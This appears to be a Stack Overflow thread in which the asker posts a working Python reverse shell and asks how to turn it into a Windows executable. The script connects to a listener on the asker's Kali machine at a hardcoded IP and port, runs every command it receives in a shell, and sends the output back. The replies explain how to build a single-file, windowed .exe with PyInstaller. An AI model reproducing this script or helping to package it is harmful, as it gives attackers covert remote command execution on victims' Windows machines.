# how to make a python file executable on windows?

Tags: python, windows, file, reverse-shell

#!/usr/bin/python

import subprocess
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.1.7", 4444))  # first parameter is IP address of your kali linux machine

while True:
command = sock.recv(2048)
if command == "q":
break
else:
proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
result = proc.stdout.read() + proc.stderr.read()
sock.send(result)

sock.close()

Comment: Does this answer your question? [How can I convert a .py to .exe for Python?](https://stackoverflow.com/questions/41570359/how-can-i-convert-a-py-to-exe-for-python)

Comment: Are you asking about creating a standalone `.exe` file or running your script as `./script.py` using the `#!/usr/bin/python` shebang when on Linux/Mac?

Answer (score 0):

I would recommend the tool PyInstaller. You can find the docs [here](https://pyinstaller.readthedocs.io/en/stable/#using-pyinstaller). ;)

> I would suggest to first read the Using Pyinstaller section in the
> documentation of the module itself.
>
> You can also use some tutorials (e.g. Matt Borgerson's one).
>
> In order to recap you should:
>
> write your script and make sure that it works
>
> run from the command line:
>
> ~\ pyinstaller your_file_name.py
>
> this command will generate a your_file_name.spec file where you can include all the dll required by your application and any custom
> settings (Using Spec Files)
>
> once you have decided what to include in your .exe application you can run from the command line
>
> ~\ pyinstaller [option1] [option2] your_file_name.py
>
> You can find the full list the options in the documentation.
>
> --onefile: Create a one-file bundled executable.
>
> --windowed: Parameter to chooseif you are compiling in Mac OS X or Windows
> --icon= : Choose the file to use as icon for file.